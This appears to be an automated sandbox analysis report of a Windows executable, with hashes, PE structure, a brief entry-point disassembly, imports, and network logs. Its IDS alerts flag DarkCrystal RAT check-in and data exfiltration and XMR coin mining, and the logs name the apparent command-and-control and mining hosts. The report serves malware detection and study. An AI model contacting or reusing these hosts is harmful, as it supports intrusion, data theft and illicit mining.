                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f............................~'... ...@....@.. ....................................@.................................,'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................`'......H.......(!................................................................(....*.0..!.......r...pre..p.{....(....(....&..&..*....................0..........ri..p(....&..&..*....................0..K.......s.......}...........s....s....(....~....-........s.........~....s....(....*..(....*.BSJB............v4.0.30319......l.......#~..@.......#Strings....4.......#US.........#GUID....... ...#Blob...........WU........%3................................................................
                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                  Entropy (8bit):7.99838673729773
                                                                  TrID:
                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                  File name:8Ck8T5qRcC.exe
                                                                  File size:17'830'453 bytes
                                                                  MD5:4fec8faf6590f62034ad44a54175b9e9
                                                                  SHA1:d7f0d639d943aeee3f98442eec744ca0e78a07d1
                                                                  SHA256:68231c9b195a3987bc26bb9af2543f49a04c1343bbb17982bc6302a21138e33a
                                                                  SHA512:a6307fb6ced7699c4743235cbe31a8b3673f3d9fc2421ac455ece7c3c0990a15aefb20a78120d0ff62752b7e3d922056ee0212a13b85144c73b24507f9678b19
                                                                  SSDEEP:393216:ToNLbkNj0zztkKxXziCnbvCyHPSh5NzQSRAgS+aCBtd:TohLzht3nZHY59RRAP0d
                                                                  TLSH:A2073323B7E6E473E4376C315D694F4AF0A838311B584ADB03B6ADFDAED05F24295281
                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........W...6...6...6....V..6....T.'6....U..6..)MZ..6..)M...6..)M...6..)M...6...N$..6...N4..6...6...7..'M...6..'M...6..'MX..6..'M...6.
                                                                  Icon Hash:1515d4d4442f2d2d
                                                                  Entrypoint:0x421d50
                                                                  Entrypoint Section:.text
                                                                  Digitally signed:false
                                                                  Imagebase:0x400000
                                                                  Subsystem:windows gui
                                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                  Time Stamp:0x651BC7F7 [Tue Oct 3 07:51:19 2023 UTC]
                                                                  TLS Callbacks:
                                                                  CLR (.Net) Version:
                                                                  OS Version Major:5
                                                                  OS Version Minor:1
                                                                  File Version Major:5
                                                                  File Version Minor:1
                                                                  Subsystem Version Major:5
                                                                  Subsystem Version Minor:1
                                                                  Import Hash:75e9596d74d063246ba6f3ac7c5369a0
                                                                  Instruction
                                                                  call 00007F2D38C83BABh
                                                                  jmp 00007F2D38C8355Dh
                                                                  int3
                                                                  int3
                                                                  int3
                                                                  int3
                                                                  int3
                                                                  int3
                                                                  push 00424F20h
                                                                  push dword ptr fs:[00000000h]
                                                                  mov eax, dword ptr [esp+10h]
                                                                  mov dword ptr [esp+10h], ebp
                                                                  lea ebp, dword ptr [esp+10h]
                                                                  sub esp, eax
                                                                  push ebx
                                                                  push esi
                                                                  push edi
                                                                  mov eax, dword ptr [0044277Ch]
                                                                  xor dword ptr [ebp-04h], eax
                                                                  xor eax, ebp
                                                                  push eax
                                                                  mov dword ptr [ebp-18h], esp
                                                                  push dword ptr [ebp-08h]
                                                                  mov eax, dword ptr [ebp-04h]
                                                                  mov dword ptr [ebp-04h], FFFFFFFEh
                                                                  mov dword ptr [ebp-08h], eax
                                                                  lea eax, dword ptr [ebp-10h]
                                                                  mov dword ptr fs:[00000000h], eax
                                                                  ret
                                                                  int3
                                                                  int3
                                                                  int3
                                                                  int3
                                                                  int3
                                                                  int3
                                                                  int3
                                                                  int3
                                                                  int3
                                                                  int3
                                                                  int3
                                                                  mov ecx, dword ptr [ebp-10h]
                                                                  mov dword ptr fs:[00000000h], ecx
                                                                  pop ecx
                                                                  pop edi
                                                                  pop edi
                                                                  pop esi
                                                                  pop ebx
                                                                  mov esp, ebp
                                                                  pop ebp
                                                                  push ecx
                                                                  ret
                                                                  push ebp
                                                                  mov ebp, esp
                                                                  sub esp, 0Ch
                                                                  lea ecx, dword ptr [ebp-0Ch]
                                                                  call 00007F2D38C75C81h
                                                                  push 0043F388h
                                                                  lea eax, dword ptr [ebp-0Ch]
                                                                  push eax
                                                                  call 00007F2D38C860D5h
                                                                  int3
                                                                  jmp 00007F2D38C87FA8h
                                                                  push ebp
                                                                  mov ebp, esp
                                                                  and dword ptr [00466078h], 00000000h
                                                                  sub esp, 24h
                                                                  or dword ptr [004427B0h], 01h
                                                                  push 0000000Ah
                                                                  call dword ptr [004361D0h]
                                                                  test eax, eax
                                                                  je 00007F2D38C83892h
                                                                  and dword ptr [ebp-10h], 00000000h
                                                                  xor eax, eax
                                                                  push ebx
                                                                  push esi
                                                                  push edi
                                                                  xor ecx, ecx
                                                                  lea edi, dword ptr [ebp-24h]
                                                                  Programming Language:
                                                                  • [ C ] VS2008 SP1 build 30729
                                                                  • [IMP] VS2008 SP1 build 30729
                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x405c00x34.rdata
                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x405f40x50.rdata
                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x680000xe044.rsrc
                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x770000x255c.reloc
                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x3e3b00x54.rdata
                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x388b00x40.rdata
                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x360000x278.rdata
                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x3fa9c0x120.rdata
                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                  .text0x10000x345cc0x34600b7a8b04ab2248443b05e8133fb3a9064False0.5887343377088305data6.708390817791953IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                  .rdata0x360000xb4100xb600a418919d63b67e937555eec95d3b6bcbFalse0.45409083104395603Applesoft BASIC program data, first line number 45.215945456388312IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                  .data0x420000x247580x1200d8d5c95192b51ddad1857caa38e7daa9False0.4049479166666667data4.078919796039023IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                  .didat0x670000x1a40x200ee74a17c4eeb586c9811481b77498b43False0.4609375data3.5194570553957747IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                  .rsrc0x680000xe0440xe200e1d0c28d23b6b5c7cae80fcd7a967218False0.6343853705752213data6.80236513212897IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                  .reloc0x770000x255c0x2600699c6b2b1b2acad2d0f219d9328713afFalse0.783203125data6.6660836278877325IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                  PNG0x686440xb45PNG image data, 93 x 302, 8-bit/color RGB, non-interlaced1.0027729636048528
                                                                  PNG0x6918c0x15a9PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced0.9363390441839495
                                                                  RT_ICON0x6a7380x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, resolution 2834 x 2834 px/m, 256 important colors0.47832369942196534
                                                                  RT_ICON0x6aca00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, resolution 2834 x 2834 px/m, 256 important colors0.5410649819494585
                                                                  RT_ICON0x6b5480xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, resolution 2834 x 2834 px/m, 256 important colors0.4933368869936034
                                                                  RT_ICON0x6c3f00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/m0.5390070921985816
                                                                  RT_ICON0x6c8580x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/m0.41393058161350843
                                                                  RT_ICON0x6d9000x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2834 x 2834 px/m0.3479253112033195
                                                                  RT_ICON0x6fea80x3d71PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9809269502193401
                                                                  RT_DIALOG0x73c1c0x2badata0.5286532951289399
                                                                  RT_DIALOG0x73ed80x13adata0.6560509554140127
                                                                  RT_DIALOG0x740140xf2data0.71900826446281
                                                                  RT_DIALOG0x741080x14adata0.6
                                                                  RT_DIALOG0x742540x314data0.47588832487309646
                                                                  RT_DIALOG0x745680x24adata0.6279863481228669
                                                                  RT_STRING0x747b40x1fcdata0.421259842519685
                                                                  RT_STRING0x749b00x246data0.41924398625429554
                                                                  RT_STRING0x74bf80x1a6data0.514218009478673
                                                                  RT_STRING0x74da00xdcdata0.65
                                                                  RT_STRING0x74e7c0x470data0.3873239436619718
                                                                  RT_STRING0x752ec0x164data0.5056179775280899
                                                                  RT_STRING0x754500x110data0.5772058823529411
                                                                  RT_STRING0x755600x158data0.4563953488372093
                                                                  RT_STRING0x756b80xe8data0.5948275862068966
                                                                  RT_STRING0x757a00xe6data0.5695652173913044
                                                                  RT_GROUP_ICON0x758880x68data0.7019230769230769
                                                                  RT_MANIFEST0x758f00x753XML 1.0 document, ASCII text, with CRLF line terminators0.3957333333333333
                                                                  DLLImport
                                                                  KERNEL32.dllGetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, GetCurrentProcessId, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, InterlockedDecrement, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetTimeFormatW, GetDateFormatW, LocalFree, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetNumberFormatW, DecodePointer, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, IsDebuggerPresent, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapReAlloc, HeapAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage
                                                                  OLEAUT32.dllSysAllocString, SysFreeString, VariantClear
                                                                  gdiplus.dllGdipAlloc, GdipDisposeImage, GdipCloneImage, GdipCreateBitmapFromStream, GdipCreateBitmapFromStreamICM, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipFree
                                                                  TimestampProtocolSIDSignatureSource PortDest PortSource IPDest IP
                                                                  2024-08-01T04:27:06.688070+0200TCP2826930ETPRO COINMINER XMR CoinMiner Usage49738443192.168.2.495.179.241.203
                                                                  2024-08-01T04:27:45.505027+0200TCP2048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)4973980192.168.2.4194.58.42.154
                                                                  2024-08-01T04:28:25.451584+0200TCP2048130ET MALWARE [ANY.RUN] DarkCrystal Rat Exfiltration (POST)4975380192.168.2.4194.58.42.154
                                                                  2024-08-01T04:27:42.804877+0200UDP2036289ET COINMINER CoinMiner Domain in DNS Lookup (pool .hashvault .pro)5975053192.168.2.41.1.1.1
                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Aug 1, 2024 04:27:43.541836023 CEST4973980192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:27:43.547291994 CEST8049739194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:27:43.547395945 CEST4973980192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:27:45.026078939 CEST4973980192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:27:45.031477928 CEST8049739194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:27:45.406383038 CEST4973980192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:27:45.473998070 CEST8049739194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:27:45.474910021 CEST8049739194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:27:45.504803896 CEST8049739194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:27:45.505027056 CEST4973980192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:27:46.032799959 CEST8049739194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:27:46.033272982 CEST8049739194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:27:46.033364058 CEST4973980192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:27:49.604711056 CEST4973980192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:27:49.657040119 CEST8049739194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:27:49.855612040 CEST4974080192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:27:49.861051083 CEST8049740194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:27:49.862083912 CEST4974080192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:27:49.867995977 CEST4974080192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:27:49.873214006 CEST8049740194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:27:49.874025106 CEST8049739194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:27:49.876854897 CEST4973980192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:27:49.882309914 CEST8049739194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:27:50.151701927 CEST8049739194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:27:50.315182924 CEST4973980192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:27:50.682379961 CEST8049740194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:27:50.756028891 CEST4974080192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:27:50.868844032 CEST4974080192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:27:50.874166965 CEST8049740194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:27:51.156352043 CEST8049740194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:27:51.252652884 CEST4974080192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:27:52.245501041 CEST4973980192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:27:52.251007080 CEST8049739194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:27:52.513803005 CEST8049739194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:27:52.514266968 CEST4973980192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:27:52.519144058 CEST8049739194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:27:52.519179106 CEST8049739194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:27:52.519191027 CEST8049739194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:27:52.798106909 CEST8049739194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:27:52.924472094 CEST4973980192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:27:53.034796000 CEST4973980192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:27:53.036413908 CEST4974180192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:27:53.041486979 CEST8049739194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:27:53.041543961 CEST4973980192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:27:53.042572975 CEST8049741194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:27:53.042653084 CEST4974180192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:27:53.042762995 CEST4974180192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:27:53.050988913 CEST8049741194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:27:53.393539906 CEST4974180192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:27:53.398727894 CEST8049741194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:27:53.398749113 CEST8049741194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:27:53.837814093 CEST8049741194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:27:53.924467087 CEST4974180192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:27:53.968586922 CEST8049741194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:27:54.127569914 CEST4974180192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:27:56.161437035 CEST8049740194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:27:56.164872885 CEST4974080192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:27:58.853513956 CEST8049741194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:27:58.853657007 CEST4974180192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:27:59.859435081 CEST4974380192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:27:59.868697882 CEST8049743194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:27:59.868884087 CEST4974380192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:27:59.877945900 CEST4974380192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:27:59.883210897 CEST8049743194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:00.247396946 CEST4974380192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:00.253099918 CEST8049743194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:00.253118038 CEST8049743194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:00.689836025 CEST8049743194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:00.752691984 CEST4974380192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:00.825644970 CEST8049743194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:00.955818892 CEST4974380192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:05.699045897 CEST8049743194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:05.699196100 CEST4974380192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:05.798696041 CEST4974480192.168.2.4208.95.112.1
                                                                  Aug 1, 2024 04:28:05.803570986 CEST8049744208.95.112.1192.168.2.4
                                                                  Aug 1, 2024 04:28:05.803668022 CEST4974480192.168.2.4208.95.112.1
                                                                  Aug 1, 2024 04:28:05.803774118 CEST4974480192.168.2.4208.95.112.1
                                                                  Aug 1, 2024 04:28:05.808605909 CEST8049744208.95.112.1192.168.2.4
                                                                  Aug 1, 2024 04:28:05.919732094 CEST4974080192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:05.925266027 CEST8049740194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:05.943113089 CEST4974380192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:05.943424940 CEST4974580192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:05.948393106 CEST8049743194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:05.948549986 CEST8049745194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:05.948663950 CEST4974580192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:05.948719978 CEST4974580192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:05.954044104 CEST8049745194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:06.197225094 CEST4974680192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:06.202572107 CEST8049746194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:06.202661037 CEST4974680192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:06.202893019 CEST4974680192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:06.208067894 CEST8049746194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:06.314574003 CEST4974580192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:06.550543070 CEST4974680192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:06.627587080 CEST4974680192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:06.627830982 CEST4974580192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:07.127603054 CEST4974680192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:07.273669004 CEST8049744208.95.112.1192.168.2.4
                                                                  Aug 1, 2024 04:28:07.274243116 CEST8049744208.95.112.1192.168.2.4
                                                                  Aug 1, 2024 04:28:07.274374008 CEST4974480192.168.2.4208.95.112.1
                                                                  Aug 1, 2024 04:28:07.274805069 CEST8049745194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:07.274915934 CEST8049744208.95.112.1192.168.2.4
                                                                  Aug 1, 2024 04:28:07.275496006 CEST8049745194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:07.275549889 CEST8049746194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:07.275551081 CEST4974480192.168.2.4208.95.112.1
                                                                  Aug 1, 2024 04:28:07.275592089 CEST4974580192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:07.275804996 CEST8049745194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:07.275856972 CEST4974580192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:07.275859118 CEST8049744208.95.112.1192.168.2.4
                                                                  Aug 1, 2024 04:28:07.275887966 CEST8049746194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:07.275935888 CEST4974680192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:07.275938034 CEST4974480192.168.2.4208.95.112.1
                                                                  Aug 1, 2024 04:28:07.278335094 CEST8049745194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:07.278793097 CEST8049745194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:07.278924942 CEST4974580192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:07.280627966 CEST8049745194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:07.280668020 CEST8049746194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:07.280695915 CEST8049746194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:07.280725956 CEST8049746194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:07.280752897 CEST8049745194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:07.280780077 CEST8049746194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:07.280807018 CEST8049745194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:07.280868053 CEST8049746194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:07.284101009 CEST8049745194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:07.440947056 CEST8049746194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:07.444894075 CEST4974680192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:07.549725056 CEST8049746194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:07.721338034 CEST4974680192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:07.730700970 CEST8049745194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:07.924505949 CEST4974580192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:08.368081093 CEST49747443192.168.2.4162.159.136.232
                                                                  Aug 1, 2024 04:28:08.368164062 CEST44349747162.159.136.232192.168.2.4
                                                                  Aug 1, 2024 04:28:08.368241072 CEST49747443192.168.2.4162.159.136.232
                                                                  Aug 1, 2024 04:28:08.392283916 CEST49747443192.168.2.4162.159.136.232
                                                                  Aug 1, 2024 04:28:08.392360926 CEST44349747162.159.136.232192.168.2.4
                                                                  Aug 1, 2024 04:28:08.866635084 CEST44349747162.159.136.232192.168.2.4
                                                                  Aug 1, 2024 04:28:08.867140055 CEST49747443192.168.2.4162.159.136.232
                                                                  Aug 1, 2024 04:28:08.867202997 CEST44349747162.159.136.232192.168.2.4
                                                                  Aug 1, 2024 04:28:08.868834972 CEST44349747162.159.136.232192.168.2.4
                                                                  Aug 1, 2024 04:28:08.869060040 CEST49747443192.168.2.4162.159.136.232
                                                                  Aug 1, 2024 04:28:08.869667053 CEST49747443192.168.2.4162.159.136.232
                                                                  Aug 1, 2024 04:28:08.869798899 CEST44349747162.159.136.232192.168.2.4
                                                                  Aug 1, 2024 04:28:08.869880915 CEST49747443192.168.2.4162.159.136.232
                                                                  Aug 1, 2024 04:28:08.869929075 CEST44349747162.159.136.232192.168.2.4
                                                                  Aug 1, 2024 04:28:08.870011091 CEST49747443192.168.2.4162.159.136.232
                                                                  Aug 1, 2024 04:28:08.870069981 CEST44349747162.159.136.232192.168.2.4
                                                                  Aug 1, 2024 04:28:08.870317936 CEST49747443192.168.2.4162.159.136.232
                                                                  Aug 1, 2024 04:28:08.870418072 CEST44349747162.159.136.232192.168.2.4
                                                                  Aug 1, 2024 04:28:08.870589018 CEST49747443192.168.2.4162.159.136.232
                                                                  Aug 1, 2024 04:28:08.870666027 CEST44349747162.159.136.232192.168.2.4
                                                                  Aug 1, 2024 04:28:08.870800972 CEST49747443192.168.2.4162.159.136.232
                                                                  Aug 1, 2024 04:28:08.870878935 CEST44349747162.159.136.232192.168.2.4
                                                                  Aug 1, 2024 04:28:08.870930910 CEST49747443192.168.2.4162.159.136.232
                                                                  Aug 1, 2024 04:28:08.870953083 CEST44349747162.159.136.232192.168.2.4
                                                                  Aug 1, 2024 04:28:08.871011019 CEST49747443192.168.2.4162.159.136.232
                                                                  Aug 1, 2024 04:28:08.871035099 CEST44349747162.159.136.232192.168.2.4
                                                                  Aug 1, 2024 04:28:08.871045113 CEST49747443192.168.2.4162.159.136.232
                                                                  Aug 1, 2024 04:28:08.871062994 CEST44349747162.159.136.232192.168.2.4
                                                                  Aug 1, 2024 04:28:08.871097088 CEST49747443192.168.2.4162.159.136.232
                                                                  Aug 1, 2024 04:28:08.871114969 CEST44349747162.159.136.232192.168.2.4
                                                                  Aug 1, 2024 04:28:08.871146917 CEST49747443192.168.2.4162.159.136.232
                                                                  Aug 1, 2024 04:28:08.871164083 CEST44349747162.159.136.232192.168.2.4
                                                                  Aug 1, 2024 04:28:08.871201992 CEST49747443192.168.2.4162.159.136.232
                                                                  Aug 1, 2024 04:28:08.871220112 CEST44349747162.159.136.232192.168.2.4
                                                                  Aug 1, 2024 04:28:08.871237040 CEST49747443192.168.2.4162.159.136.232
                                                                  Aug 1, 2024 04:28:08.871248960 CEST44349747162.159.136.232192.168.2.4
                                                                  Aug 1, 2024 04:28:08.871269941 CEST49747443192.168.2.4162.159.136.232
                                                                  Aug 1, 2024 04:28:08.871287107 CEST44349747162.159.136.232192.168.2.4
                                                                  Aug 1, 2024 04:28:08.871320963 CEST49747443192.168.2.4162.159.136.232
                                                                  Aug 1, 2024 04:28:08.871335983 CEST44349747162.159.136.232192.168.2.4
